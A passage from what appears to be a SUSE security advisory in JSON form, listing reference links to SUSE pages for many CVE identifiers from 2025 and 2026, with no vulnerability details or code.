"summary": "SUSE CVE CVE-2025-68378 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68378/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68380 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68380/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68724 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68724/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68727 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68727/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68728 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68728/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68732 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68732/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68733 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68733/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68734 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68734/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68736 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68736/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68740 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68740/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68742 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68742/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68744 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68744/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68746 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68746/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68750 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68750/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68753 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68753/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68757 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68757/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68758 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68758/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68759 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68759/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68765 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68765/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68766 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68766/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68768 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68770 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68770/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68771 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68771/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68773 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68773/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68775 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68775/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68776 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68776/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68777 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68778 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68778/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68783 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68783/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68785 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68785/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68788 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68788/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68789 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68789/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68797 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68798/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68800 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68800/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68801 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68803/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68804 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68804/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68808 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68810 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68810/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68815 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68819 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68820 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71064 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71071 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71071/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71077 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71077/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71082 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71083 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71086 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71086/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71087 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71087/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71088 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71089 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71091 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71093 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71094 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71095 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71096 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71096/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71098 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71098/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71100 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71100/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71104 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71104/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71108 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71108/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71111 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71111/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71113 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71113/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71114 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71116 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71116/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71118 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71118/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71119 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71119/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71120 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71120/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71126 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71126/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71130 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71130/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71131 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71133 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71137 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71138 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71138/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71145 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71148 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71148/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71149 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71162 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71162/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71163 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71182 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71182/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71184 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71184/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71185 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71185/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71188 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71188/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71189 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71189/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71190 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71190/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71191 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71191/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71192 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71192/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71194 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71194/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71195 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71195/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71196 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71196/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71197 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71197/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71198 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71198/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71199 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71199/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71200 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71200/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71222 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71222/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71224 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71224/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71225 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71225/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71229 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71229/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71231 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71231/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71232 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71232/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71234 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71234/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71235 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71235/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71236 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71236/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22976 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22976/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22977 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22978 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22978/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22979 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22979/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22982 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22982/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22984 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22984/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22985 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22985/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22988 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22988/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22990 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22990/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22991 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22991/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22992 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22993 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22993/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22996 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22997 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22998 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22998/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23000 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23003 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23003/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23004 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23004/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23005 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23006 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23010 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23010/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23011 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23011/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23017 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23017/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23021 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23021/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23026 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23026/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23033 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23033/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23035 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23035/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23037 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23037/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23049 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23049/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23053 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23053/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23056 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23056/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23057 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23057/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23058 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23058/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23060 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23060/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23061 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23061/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23063 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23063/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23064 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23068 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23068/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23071 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23071/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23073 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23073/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23074 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23074/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23076 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23078 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23080 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23082 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23083 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23084 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23085 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23086 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23086/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23089 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23090 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23090/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23091 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23094 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23095 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23096 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23096/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23099 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23101 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23102 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23102/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23104 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23104/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23105 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23105/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23107 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23107/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23108 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23108/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23110 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23110/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23111 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23111/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23112 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23113 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23113/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23116 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23116/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23119 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23119/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23121 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23121/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23129 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23129/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23133 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23135 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23139 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23139/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23141 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23145 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23146 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23146/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23150 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23150/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23151 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23151/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23152 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23152/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23155 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23155/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23156 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23163 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23166 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23166/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23167 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23167/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23170 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23170/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23171 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23171/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23172 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23172/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23173 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23173/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23176 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23176/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23178 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23179 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23179/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23182 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23182/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23190 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23190/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23191 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23191/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23198 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23198/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23202 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23202/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23207 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23207/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23208 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23208/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23209 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23213 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23213/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23214 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23214/"
},
{
"category": "self",
